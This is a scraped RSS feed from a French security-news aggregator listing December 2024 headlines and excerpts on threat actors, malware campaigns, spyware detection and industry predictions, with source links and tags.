This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-12T07:12:01+00:00 www.secnews.physaphae.fr Dragos - CTI Society Operational technology (OT) environments are vital systems that keep industries like manufacturing, energy, and transportation running. These systems are facing... The post 3 Common Cyber Threat Intelligence (CTI) Challenges to Overcome in OT Cybersecurity   first appeared on Dragos.

---

>Operational technology (OT) environments are vital systems that keep industries like manufacturing, energy, and transportation running. These systems are facing... The post 3 Common Cyber Threat Intelligence (CTI) Challenges to Overcome in OT Cybersecurity   first appeared on Dragos.]]> 2024-12-06T18:35:45+00:00 https://www.dragos.com/blog/3-common-cyber-threat-intelligence-cti-challenges-to-overcome-in-ot-cybersecurity/ www.secnews.physaphae.fr/article.php?IdArticle=8620794 False Threat,Industrial None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-06T17:20:13+00:00 https://community.riskiq.com/article/d976ecc3 www.secnews.physaphae.fr/article.php?IdArticle=8620790 False Ransomware,Spam,Malware,Tool,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-06T16:17:50+00:00 https://community.riskiq.com/article/ccb7bd15 www.secnews.physaphae.fr/article.php?IdArticle=8620767 False Ransomware,Tool,Vulnerability,Threat APT 45 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-06T15:33:20+00:00 https://community.riskiq.com/article/9c09d15e www.secnews.physaphae.fr/article.php?IdArticle=8620737 False Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The threat actors behind the More_eggs malware have been linked to two new malware families, indicating an expansion of its malware-as-a-service (MaaS) operation. This includes a novel information-stealing backdoor called RevC2 and a loader codenamed Venom Loader, both of which are deployed using VenomLNK, a staple tool that serves as an initial access vector for the deployment of follow-on]]> 2024-12-06T13:52:00+00:00 https://thehackernews.com/2024/12/moreeggs-maas-expands-operations-with.html www.secnews.physaphae.fr/article.php?IdArticle=8620521 False Malware,Tool,Threat None 2.0000000000000000 Global Security Mag - Site de news francais Points de Vue

---

Les principales menaces en cybersécurité pour 2025 Par Rich Turner, Président EMEA chez CyberArk - Points de Vue]]> 2024-12-06T13:20:51+00:00 https://www.globalsecuritymag.fr/les-principales-menaces-en-cybersecurite-pour-2025.html www.secnews.physaphae.fr/article.php?IdArticle=8620662 False Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The threat actor known as Gamaredon has been observed leveraging Cloudflare Tunnels as a tactic to conceal its staging infrastructure hosting a malware called GammaDrop. The activity is part of an ongoing spear-phishing campaign targeting Ukrainian entities since at least early 2024 that\'s designed to drop the Visual Basic Script malware, Recorded Future\'s Insikt Group said in a new analysis.]]> 2024-12-06T12:33:00+00:00 https://thehackernews.com/2024/12/hackers-leveraging-cloudflare-tunnels.html www.secnews.physaphae.fr/article.php?IdArticle=8620499 False Malware,Threat None 2.0000000000000000 Schneier on Security - Chercheur Cryptologue Américain This tool seems to do a pretty good job. The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection. For paying iVerify customers, the tool regularly checks devices for potential compromise. But the company also offers a free version of the feature for anyone who downloads the iVerify Basics app for $1. These users can walk through steps to generate and send a special diagnostic utility file to iVerify and receive analysis within hours. Free users can use the tool once a month. iVerify’s infrastructure is built to be privacy-preserving, but to run the Mobile Threat Hunting feature, users must enter an email address so the company has a way to contact them if a scan turns up spyware—as it did in the seven recent Pegasus discoveries...

---

This tool seems to do a pretty good job. The company’s Mobile Threat Hunting feature uses a combination of malware signature-based detection, heuristics, and machine learning to look for anomalies in iOS and Android device activity or telltale signs of spyware infection. For paying iVerify customers, the tool regularly checks devices for potential compromise. But the company also offers a free version of the feature for anyone who downloads the iVerify Basics app for $1. These users can walk through steps to generate and send a special diagnostic utility file to iVerify and receive analysis within hours. Free users can use the tool once a month. iVerify’s infrastructure is built to be privacy-preserving, but to run the Mobile Threat Hunting feature, users must enter an email address so the company has a way to contact them if a scan turns up spyware—as it did in the seven recent Pegasus discoveries...]]> 2024-12-06T12:09:12+00:00 https://www.schneier.com/blog/archives/2024/12/detecting-pegasus-infections.html www.secnews.physaphae.fr/article.php?IdArticle=8620625 False Malware,Tool,Threat,Mobile None 3.0000000000000000 Zataz - Magazine Francais de secu Les prédictions 2025 cybersécurité commencent à pointer le bout de leur souris. Les grandes tendances à venir pour 2025 : utilisation accrue de l\'Intelligence Artificielle (IA), tant pour protéger que pour attaquer, et par une sophistication inquiétante des menaces liées à l\'ingénierie sociale....]]> 2024-12-06T10:10:54+00:00 https://www.zataz.com/predictions-2025-ia-usurpations-didentite/ www.secnews.physaphae.fr/article.php?IdArticle=8620569 False Threat,Prediction None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-05T23:21:01+00:00 https://community.riskiq.com/article/699406a4 www.secnews.physaphae.fr/article.php?IdArticle=8620355 False Malware,Vulnerability,Threat,Mobile,Prediction None 2.0000000000000000 Dark Reading - Informationweek Branch Cloudflare Tunnels is just the latest legitimate cloud service that cybercriminals and state-sponsored threat actors are abusing to hide their tracks.]]> 2024-12-05T22:04:39+00:00 https://www.darkreading.com/cloud-security/russias-bluealpha-apt-cloudflare-tunnels www.secnews.physaphae.fr/article.php?IdArticle=8620316 False Threat,Cloud None 2.0000000000000000 RedCanary - Red Canary Google Cloud Platform security: How our threat research team gets from “huh, that\'s weird” to robust detection coverage]]> 2024-12-05T21:53:59+00:00 https://redcanary.com/blog/threat-detection/gcp-service-accounts/ www.secnews.physaphae.fr/article.php?IdArticle=8620311 False Threat,Cloud None 2.0000000000000000 Recorded Future - FLux Recorded Future The cybersecurity firm did not name the company but said the attack was “likely carried out by a China-based threat actor, since some of the tools used in this attack have been previously associated with Chinese attackers.”]]> 2024-12-05T21:18:49+00:00 https://therecord.media/us-org-with-presence-in-china-hacked-symantec www.secnews.physaphae.fr/article.php?IdArticle=8620292 False Tool,Threat None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) Cybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances. The critical vulnerability in question is CVE-2024-41713 (CVSS score: 9.8), which relates to a case of insufficient input]]> 2024-12-05T20:26:00+00:00 https://thehackernews.com/2024/12/critical-mitel-micollab-flaw-exposes.html www.secnews.physaphae.fr/article.php?IdArticle=8620131 False Vulnerability,Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-05T18:22:13+00:00 https://community.riskiq.com/article/53869980 www.secnews.physaphae.fr/article.php?IdArticle=8620235 False Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A previously undocumented threat activity cluster dubbed Earth Minotaur is leveraging the MOONSHINE exploit kit and an unreported Android-cum-Windows backdoor called DarkNimbus to facilitate long-term surveillance operations targeting Tibetans and Uyghurs. "Earth Minotaur uses MOONSHINE to deliver the DarkNimbus backdoor to Android and Windows devices, targeting WeChat, and possibly making it a]]> 2024-12-05T18:13:00+00:00 https://thehackernews.com/2024/12/hackers-target-uyghurs-and-tibetans.html www.secnews.physaphae.fr/article.php?IdArticle=8620079 False Threat,Mobile None 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A suspected Chinese threat actor targeted a large U.S. organization earlier this year as part of a four-month-long intrusion. According to Broadcom-owned Symantec, the first evidence of the malicious activity was detected on April 11, 2024 and continued until August. However, the company doesn\'t rule out the possibility that the intrusion may have occurred earlier. "The attackers moved laterally]]> 2024-12-05T16:30:00+00:00 https://thehackernews.com/2024/12/researchers-uncover-4-month-cyberattack.html www.secnews.physaphae.fr/article.php?IdArticle=8620019 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch The emerging threat actor, potentially a Chinese state-sponsored APT, is using the known exploit kit Moonshine in cross-platform attacks that deliver a previously undisclosed backdoor called "DarkNimbus" to ethnic minorities, including Tibetans.]]> 2024-12-05T15:58:36+00:00 https://www.darkreading.com/cyberattacks-data-breaches/earth-minotaur-exploits-wechat-bugs-spyware-uyghurs www.secnews.physaphae.fr/article.php?IdArticle=8620127 False Threat None 3.0000000000000000 Mandiant - Blog Sécu de Mandiant Executive Summary Whether through a comprehensive Red Team engagement or a targeted external assessment, incorporating application security (AppSec) expertise enables organizations to better simulate the tactics and techniques of modern adversaries. This includes: Leveraging minimal access for maximum impact: There is no need for high privilege escalation. Red Team objectives can often be achieved with limited access, highlighting the importance of securing all internet-facing assets. Recognizing the potential of low-impact vulnerabilities through vulnerability chaining: Low- and medium-impact vulnerabilities can be exploited in combination to achieve significant impact. Developing your own exploits: Skilled adversaries or consultants will invest the time and resources to reverse-engineer and/or find zero-day vulnerabilities in the absence of public proof-of-concept exploits. Employing diverse skill sets: Red Team members should include individuals with a wide range of expertise, including AppSec. Fostering collaboration: Combining diverse skill sets can spark creativity and lead to more effective attack simulations. Integrating AppSec throughout the engagement: Offensive application security contributions can benefit Red Teams at every stage of the project. By embracing this approach, organizations can proactively defend against a constantly evolving threat landscape, ensuring a more robust and resilient security posture. Introduction In today\'s rapidly evolving threat landscape, organizations find themselves engaged in an ongoing arms race against increasingly sophisticated cyber criminals and nation-state actors. To stay ahead of these adversaries, many organizations turn to Red Team assessments, simulating real-world attacks to expose vulnerabilities before they are exploited. However, many traditional Red Team assessments typically prioritize attacking network and infrastructure components, often overlooking a critical aspect of modern attack surfaces: web applications. This gap hasn\'t gone unnoticed by cyber criminals. In recent years, industry reports consistently highlight the evolving trend of attackers exploiting public-facing application vulnerabilities as a primary entry point into organizations. This aligns with Mandiant\'s observations of common tactics used by threat actors, as observed in our 2024 M-Trends Report]]> 2024-12-05T14:00:00+00:00 https://cloud.google.com/blog/topics/threat-intelligence/red-team-application-security-testing/ www.secnews.physaphae.fr/article.php?IdArticle=8620098 False Tool,Vulnerability,Threat,Studies,Mobile,Prediction,Cloud,Commercial None 3.0000000000000000 HackRead - Chercher Cyber SUMMARY The machine learning-based threat-hunting system of leading threat intelligence and cybersecurity firm ReversingLabs (RL) recently detected malicious…]]> 2024-12-05T13:46:51+00:00 https://hackread.com/aiocpa-python-package-cryptocurrency-infostealer/ www.secnews.physaphae.fr/article.php?IdArticle=8620070 False Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The China-linked threat actor known as MirrorFace has been attributed to a new spear-phishing campaign mainly targeting individuals and organizations in Japan since June 2024. The aim of the campaign is to deliver backdoors known as NOOPDOOR (aka HiddenFace) and ANEL (aka UPPERCUT), Trend Micro said in a technical analysis. "An interesting aspect of this campaign is the comeback of a backdoor]]> 2024-12-05T13:00:00+00:00 https://thehackernews.com/2024/12/anel-and-noopdoor-backdoors-weaponized.html www.secnews.physaphae.fr/article.php?IdArticle=8619940 False Threat,Prediction,Technical None 2.0000000000000000 ProofPoint - Cyber Firms 2024-12-05T12:49:54+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/identify-prevent-dropbox-phishing-scams www.secnews.physaphae.fr/article.php?IdArticle=8620125 False Ransomware,Data Breach,Malware,Tool,Threat,Medical,Cloud None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine Microsoft has found that Russian APT Secret Blizzard piggybacks on other cybercriminals\' infr4asytructure to conduct cyber espionage]]> 2024-12-05T11:45:00+00:00 https://www.infosecurity-magazine.com/news/russia-hackers-exploit-rival/ www.secnews.physaphae.fr/article.php?IdArticle=8620020 False Threat None 2.0000000000000000 SentinelOne (APT) - Cyber Firms Threat actors abused Visual Studio Code and Microsoft Azure infrastructure to target large business-to-business IT service providers in Southern Europe.]]> 2024-12-05T10:55:33+00:00 https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/ www.secnews.physaphae.fr/article.php?IdArticle=8619983 False Threat None 3.0000000000000000 Intigrity - Blog Before diving into security controls or implementing bug bounty programs, to first establish a strong foundation in risk management and define your risk acceptance criteria. Defending your assets requires identifying and mapping each asset to the specific types and levels of threats that could impact them. Security cannot be approached reactively - securing assets is a strategi…]]> 2024-12-05T00:00:00+00:00 https://blog.intigriti.com/business-insights/the-cyber-threat-landscape-part-5-staying-safe-with-multi-layered-defense www.secnews.physaphae.fr/article.php?IdArticle=8619913 False Threat None 3.0000000000000000 TrendMicro - Security Firm Blog Trend Micro\'s monitoring of the MOONSHINE exploit kit revealed how it\'s used by the threat actor Earth Minotaur to exploit Android messaging app vulnerabilities and install the DarkNimbus backdoor for surveillance.]]> 2024-12-05T00:00:00+00:00 https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html www.secnews.physaphae.fr/article.php?IdArticle=8619909 False Vulnerability,Threat,Mobile,Prediction None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The Russia-linked advanced persistent threat (APT) group known as Turla has been linked to a previously undocumented campaign that involved infiltrating the command-and-control (C2) servers of a Pakistan-based hacking group named Storm-0156 to conduct its own operations since 2022. The activity, first observed in December 2022, is the latest instance of the nation-state adversary "embedding]]> 2024-12-04T22:53:00+00:00 https://thehackernews.com/2024/12/russia-linked-turla-exploits-pakistani.html www.secnews.physaphae.fr/article.php?IdArticle=8619578 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-04T22:13:50+00:00 https://community.riskiq.com/article/2e9104a0 www.secnews.physaphae.fr/article.php?IdArticle=8619736 False Malware,Tool,Threat None 2.0000000000000000 Dark Reading - Informationweek Branch Individuals concerned about the privacy of their communications should consider using encrypted messaging apps and encrypted voice communications, CISA and FBI officials say.]]> 2024-12-04T22:06:31+00:00 https://www.darkreading.com/cyberattacks-data-breaches/cisa-issue-guidance-telecoms-salt-typhoon-threat www.secnews.physaphae.fr/article.php?IdArticle=8619691 False Threat None 3.0000000000000000 Dark Reading - Informationweek Branch Parasitic advanced persistent threat Secret Blizzard accesses another APT\'s infrastructure and steals what it has stolen from South Asian government and military targets.]]> 2024-12-04T20:47:46+00:00 https://www.darkreading.com/threat-intelligence/russian-fsb-hackers-breach-pakistan-storm-0156 www.secnews.physaphae.fr/article.php?IdArticle=8619717 False Threat None 3.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-04T20:38:31+00:00 https://community.riskiq.com/article/21eb0031 www.secnews.physaphae.fr/article.php?IdArticle=8619687 False Ransomware,Malware,Tool,Threat None 4.0000000000000000 Dark Reading - Informationweek Branch The notorious spyware from Israel\'s NSO Group has been found targeting journalists, government officials, and corporate executives in multiple variants discovered in a threat scan of 3,500 mobile phones.]]> 2024-12-04T20:06:00+00:00 https://www.darkreading.com/endpoint-security/pegasus-spyware-infections-ios-android-devices www.secnews.physaphae.fr/article.php?IdArticle=8619642 False Threat,Mobile None 2.0000000000000000 Veracode - Application Security Research, News, and Education Blog How does the exponential advancement of technology impact the security landscape? It makes managing the fundamental risk of the technology, the software, exponentially more complex. From AI accelerating risky code production to cloud infrastructure increasing the attack surface, the world of application risk management is enduring a rapid transformation that needs immediate attention.   Here are my predictions for 2025 and how to ride this wave of transformation to security as an enabler of progress rather than a barrier.  1. Exponentially Complex Risk Will Make Context Everything Since becoming CEO in April, nearly every week I\'m speaking with a customer about concerns regarding the increased attack surface from the expansion of cloud technologies. To measure and manage these risks, you need context.  Context allows you to answer critical questions, like:  What are the risks?   What is the likelihood a given threat will occur? …]]> 2024-12-04T16:22:21+00:00 https://www.veracode.com/blog/secure-development/5-predictions-about-managing-software-risks-2025 www.secnews.physaphae.fr/article.php?IdArticle=8619694 False Threat,Prediction,Cloud None 3.0000000000000000 DarkTrace - DarkTrace: AI bases detection Black Friday and Cyber Monday are prime targets for cyber-attacks, as consumer spending rises and threat actors flock to take advantage. Darktrace analysis reveals a surge in retail cyber scams at the opening of the peak 2024 shopping period, and the top brands that scammers love to impersonate. Plus, don\'t forget to check out our top tips for holiday-proofing your SOC before you clock off for the festive season.]]> 2024-12-04T15:38:00+00:00 https://darktrace.com/blog/phishing-attacks-surge-in-buildup-to-black-friday www.secnews.physaphae.fr/article.php?IdArticle=8619453 False Threat None 1.00000000000000000000 Global Security Mag - Site de news francais Special Reports

---

Black Friday triggers more than 600% rise in attempted retail cyber scams. Analysis from Darktrace\'s threat intelligence team using data from across the Darktrace customer fleet shows that during Black Friday week (25th to 29th November 2024) - Special Reports]]> 2024-12-04T14:49:29+00:00 https://www.globalsecuritymag.fr/black-friday-triggers-more-than-600-rise-in-attempted-retail-cyber-scams.html www.secnews.physaphae.fr/article.php?IdArticle=8619524 False Threat None 1.00000000000000000000 Global Security Mag - Site de news francais Business

---

Nozomi Networks et Advens s\'associent pour offrir des services de cybersécurité avancés aux environnements industriels et d\'infrastructures critiques • • La visibilité OT et IoT, la détection des menaces et la gestion des risques de Nozomi Networks sont désormais intégrées aux services managés de sécurité d\'Advens, disponibles à travers toute l\'Europe. • Parmi les clients bénéficiant de ce partenariat MSSP figurent Les Jeux olympiques de Paris - Business]]> 2024-12-04T14:40:13+00:00 https://www.globalsecuritymag.fr/nozomi-networks-et-advens-s-associent-pour-offrir-des-services-de-cybersecurite.html www.secnews.physaphae.fr/article.php?IdArticle=8619494 False Threat,Industrial None 3.0000000000000000 IndustrialCyber - cyber risk firms for industrial The U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian...

---

>The U.S. Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian... ]]> 2024-12-04T14:30:00+00:00 https://industrialcyber.co/critical-infrastructure/global-cybersecurity-agencies-warn-of-chinese-espionage-threat-to-telecom-networks/ www.secnews.physaphae.fr/article.php?IdArticle=8619551 False Threat None 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC Managed detection and response (MDR) is forecasted to be the highest growth area of security services, with a projected 17.1 percent CAGR through 2028. This is in part due to the continued, acute need for support with threat monitoring, detection, and response. However, it’s also due to a growing need for help with risk identification, management and governance, exposure and vulnerability management, and incident readiness due to increasingly stringent requirements by regulators for reporting in these areas. Let’s compare that to the forecasted growth rate of network security products (a 9.9 percent 5-year CAGR, 2023-28, projected to reach $32.8 billion) and security software spending (a 13.4 percent 5-year CAGR, 2023-28, projected to reach $132.0 billion). What’s the storyline? The desire for help and expertise within security is as critical as the need for security products themselves. And, as the threat landscape grows ever-more formidable, especially with adversaries leveraging new AI tech, that need is likely not going to wane.  With this growing demand, many, many different (and very large) providers have realized the opportunity in security services and are diving into the security services market for their piece of the “cyber money pie.” This includes everyone from software vendors, telecom companies, cloud service providers, IT service providers and traditional IT consulting firms to global MSPs (managed service providers) and MSSPs (managed security service providers). This is creating a very crowded market, and one in which business models are quickly changing so providers can better compete. For example, many organizations now see some of the big consultancies as a “one-stop shop,” for everything from consulting to MDR. In managed security services, for example, the top 10 MSSPs include (alphabetically): Accenture, Atos, AT&T (LevelBlue), Deloitte, Fortinet, Leidos, HCL Tech, NTT Data, PwC, and Tata Consultancy Services. Together, these providers hold 49 percent of MSS market share worldwide. Extending beyond the top 10 to top the 30 global MSS providers, the total “owned” market share jumps to 88 percent, leaving just 12 percent for the smaller, regional players. The raises several questions. Can the smaller, regional players compete against these big guns? Or, do they have to remain satisfied with fighting over the remaining 12 percent market share globally (which equates to approximately $3.5 million worldwide for MSS in 2025). Is it possible for smaller players to take a portion of the $26 million projected 2025 market share from the top 30? How can smaller, regional players win the security service game? Yes, smaller, regional service providers are going to be the most challenged as the services market continues its rapid evolution, especially as they try to keep up with technology changes, AI’s impact on service delivery, cyber skills shortages, and more. However, they also have an advantage, including the ability to: Specialize in industry or specific tech environments such as OT, cloud, or edge Provide regional context (including culture and language support) Partner with the larger players who can’t be everything to everyone  This is wh]]> 2024-12-04T14:00:00+00:00 https://levelblue.com/blogs/security-essentials/how-regional-service-providers-can-grab-a-larger-share-of-the-cybersecurity-market www.secnews.physaphae.fr/article.php?IdArticle=8619456 False Vulnerability,Threat,Industrial,Cloud Deloitte 2.0000000000000000 Checkpoint - Fabricant Materiel Securite From leveraging zero-trust frameworks to educating customers, banks must adopt advanced security strategies to counter the evolving cyber threat landscape The International Day of Banks 2024 which falls on December 4th highlights the indispensable role of trust in banking. However, as banking transitions from physical ledgers to digital platforms, the foundation of trust faces unprecedented challenges from cyber threats, data breaches, and phishing scams which threaten to erode customer confidence, making cyber security not just a technological necessity but a trust enabler. Check Point Software Technologies Ltd. (NASDAQ: CHKP), a pioneer and global leader of cyber security solutions is forging […]

---

>From leveraging zero-trust frameworks to educating customers, banks must adopt advanced security strategies to counter the evolving cyber threat landscape The International Day of Banks 2024 which falls on December 4th highlights the indispensable role of trust in banking. However, as banking transitions from physical ledgers to digital platforms, the foundation of trust faces unprecedented challenges from cyber threats, data breaches, and phishing scams which threaten to erode customer confidence, making cyber security not just a technological necessity but a trust enabler. Check Point Software Technologies Ltd. (NASDAQ: CHKP), a pioneer and global leader of cyber security solutions is forging […] ]]> 2024-12-04T13:00:20+00:00 https://blog.checkpoint.com/security/from-trust-to-technology-the-cyber-security-pillar-of-modern-banking/ www.secnews.physaphae.fr/article.php?IdArticle=8619428 False Threat None 1.00000000000000000000 Sygnia - CyberSecurity Firm Discover how, in the heat of defending against one adversary, we can unexpectedly encounter new, hidden threat actors.

---

>Discover how, in the heat of defending against one adversary, we can unexpectedly encounter new, hidden threat actors. ]]> 2024-12-04T12:20:54+00:00 https://www.sygnia.co/webinar/how-persistent-is-an-apt-battling-three-threat-actors/ www.secnews.physaphae.fr/article.php?IdArticle=8629008 False Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain The notorious Russian cyber-espionage group Turla is hacking other hackers, hijacking the Pakistani threat actor Storm-0156\'s infrastructure to launch their own covert attacks on already compromised networks. [...]]]> 2024-12-04T12:00:00+00:00 https://www.bleepingcomputer.com/news/security/russian-hackers-hijack-pakistani-hackers-servers-for-their-own-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8619938 False Threat None 3.0000000000000000 Bleeping Computer - Magazine Américain The notorious Russian cyber-espionage group Turla is hacking other hackers, hijacking the Pakistani threat actor Storm-0156\'s infrastructure to launch their own covert attacks on already compromised networks. [...]]]> 2024-12-04T12:00:00+00:00 https://www.bleepingcomputer.com/news/security/russian-turla-hackers-hijack-pakistani-apt-servers-for-cyber-espionage-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=8619552 False Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) A joint advisory issued by Australia, Canada, New Zealand, and the U.S. has warned of a broad cyber espionage campaign undertaken by People\'s Republic of China (PRC)-affiliated threat actors targeting telecommunications providers. "Identified exploitations or compromises associated with these threat actors\' activity align with existing weaknesses associated with victim infrastructure; no novel]]> 2024-12-04T11:37:00+00:00 https://thehackernews.com/2024/12/joint-advisory-warns-of-prc-backed.html www.secnews.physaphae.fr/article.php?IdArticle=8619306 False Threat None 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite Cyber threats evolve rapidly in our current digital world-and Australia is no exception. AI-driven scams, ransomware, and social engineering tactics are only getting more sophisticated. In this interview with Gaidar Magdanurov, President of Acronis, we explore the latest trends in Australia\'s cybersecurity landscape, the unique vulnerabilities faced by the region, and how organizations, especially small [...]]]> 2024-12-04T05:12:42+00:00 https://informationsecuritybuzz.com/australia-evolv-cyber-threat-landscape/ www.secnews.physaphae.fr/article.php?IdArticle=8619262 False Ransomware,Vulnerability,Threat None 2.0000000000000000 The State of Security - Magazine Américain It\'s not a new technique, but that doesn\'t mean that cybercriminals cannot make rich rewards from SEO poisoning. SEO poisoning is the dark art of manipulating search engines to ensure that malware-laced adverts and dangerous websites appear high on users\' results - often impersonating legitimate businesses and organisations. But the simplest way of all to get a malicious website in front of a potential victim is to create a Google advertising account, and buy your way to the top of the search results. And, according to Jérôme Segura, senior director of research at security firm Malwarebytes...]]> 2024-12-04T04:07:30+00:00 https://www.tripwire.com/state-of-security/tech-support-scams-exploit-google-ads-target-users www.secnews.physaphae.fr/article.php?IdArticle=8619350 False Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) ## Snapshot Researchers at Trend Micro Research have observed threat actors exploiting misconfigured Docker Remote API servers to deploy the Gafgyt malware, marking a shift from its traditional focus on IoT devices. ## Description The attackers create a Docker container using a legitimate "alpine" image to deploy the Gafgyt botnet malware, which can then launch DDoS attacks using various protocols such as UDP, TCP, and HTTP. The attack involves downloading a Gafgyt botnet binary with a hardcoded command-and-control (C&C) server IP address and executing it within the container. If the initial deployment fails, the attackers attempt to deploy another variant of the Gafgyt binary or a shell script that downloads and executes botnet binaries for different system architectures. The attackers use the "chroot" command to change the root directory of the container, allowing them to access and potentially modify the host\'s filesystem, which could lead to escalated privileges and control over the host system. The malware communicates with a C&C server, and based on the server\'s responses, it performs actions like executing DDoS attacks. The attackers also attempt to discover the local IP address of the victim host using Google\'s DNS server. ## Detections/Hunting Queries ### Microsoft Defender Antivirus Microsoft Defender Antivirus detects threat components as the following malware: - [Backdoor:Linux/Gafgyt](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Gafgyt) - [Trojan:Linux/Gafgyt](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name]]> 2024-12-03T20:54:13+00:00 https://community.riskiq.com/article/a74e939f www.secnews.physaphae.fr/article.php?IdArticle=8619090 False Malware,Threat,Prediction None 2.0000000000000000 Dark Reading - Informationweek Branch Cisco encourages users to update to an unaffected version of its Adaptive Security Appliance (ASA) software since there are no workarounds for the 2014 vulnerability.]]> 2024-12-03T20:25:34+00:00 https://www.darkreading.com/vulnerabilities-threats/decade-old-cisco-vulnerability-exploit www.secnews.physaphae.fr/article.php?IdArticle=8619067 False Vulnerability,Threat None 2.0000000000000000 RiskIQ - cyber risk firms (now microsoft) 2024-12-03T17:19:43+00:00 https://community.riskiq.com/article/b24308b0 www.secnews.physaphae.fr/article.php?IdArticle=8619033 False Malware,Tool,Threat None 2.0000000000000000 Dark Reading - Informationweek Branch A novel backdoor malware and a loader that customizes payload names for each victim have been added to the threat group\'s cybercriminal tool set.]]> 2024-12-03T16:19:13+00:00 https://www.darkreading.com/cyberattacks-data-breaches/venom-spider-malware-maas-platform www.secnews.physaphae.fr/article.php?IdArticle=8619008 False Malware,Tool,Threat None 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) The North Korea-aligned threat actor known as Kimsuky has been linked to a series of phishing attacks that involve sending email messages that originate from Russian sender addresses to ultimately conduct credential theft. "Phishing emails were sent mainly through email services in Japan and Korea until early September," South Korean cybersecurity company Genians said. "Then, from mid-September,]]> 2024-12-03T15:21:00+00:00 https://thehackernews.com/2024/12/north-korean-kimsuky-hackers-use.html www.secnews.physaphae.fr/article.php?IdArticle=8618916 False Threat None 2.0000000000000000 Global Security Mag - Site de news francais Product Reviews

---

Keeper Introduces Risk Management Dashboard for Enhanced Risk Visibility and Proactive Threat Mitigation Dashboard offers administrators visibility into organizational security practices and compliance posture, supported by dynamic benchmarks and real-time risk assessments - Product Reviews]]> 2024-12-03T14:58:53+00:00 https://www.globalsecuritymag.fr/keeper-introduces-risk-management-dashboard.html www.secnews.physaphae.fr/article.php?IdArticle=8618972 False Threat None 2.0000000000000000 ProofPoint - Cyber Firms 2024-12-03T12:31:21+00:00 https://www.proofpoint.com/us/blog/email-and-cloud-threats/growing-threat-mms-scam-messages www.secnews.physaphae.fr/article.php?IdArticle=8618952 False Spam,Threat,Mobile,Commercial FedEx 2.0000000000000000 Sekoia - Cyber Firms On a calm Friday afternoon, rumors of a new active threat starts hitting the various social network websites. Your CSIRT team starts checking the private channels they have with other CERTs and starts compiling a list of Indicators of Compromise (IoCs). After careful consideration, they decided to block all communications with these IoCs on the […] La publication suivante Blocklist in Sekoia est un article de Sekoia.io Blog.

---

>On a calm Friday afternoon, rumors of a new active threat starts hitting the various social network websites. Your CSIRT team starts checking the private channels they have with other CERTs and starts compiling a list of Indicators of Compromise (IoCs). After careful consideration, they decided to block all communications with these IoCs on the […] La publication suivante Blocklist in Sekoia est un article de Sekoia.io Blog.]]> 2024-12-03T10:00:00+00:00 https://blog.sekoia.io/blocklist-in-sekoia/ www.secnews.physaphae.fr/article.php?IdArticle=8618927 False Threat None 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine The Foundation for Defense of Democracies has warned that Chinese-made LIDAR sensors could be weaponized for espionage]]> 2024-12-03T09:45:00+00:00 https://www.infosecurity-magazine.com/news/chinese-lidar-dominance/ www.secnews.physaphae.fr/article.php?IdArticle=8618923 False Threat None 2.0000000000000000 Global Security Mag - Site de news francais Business

---

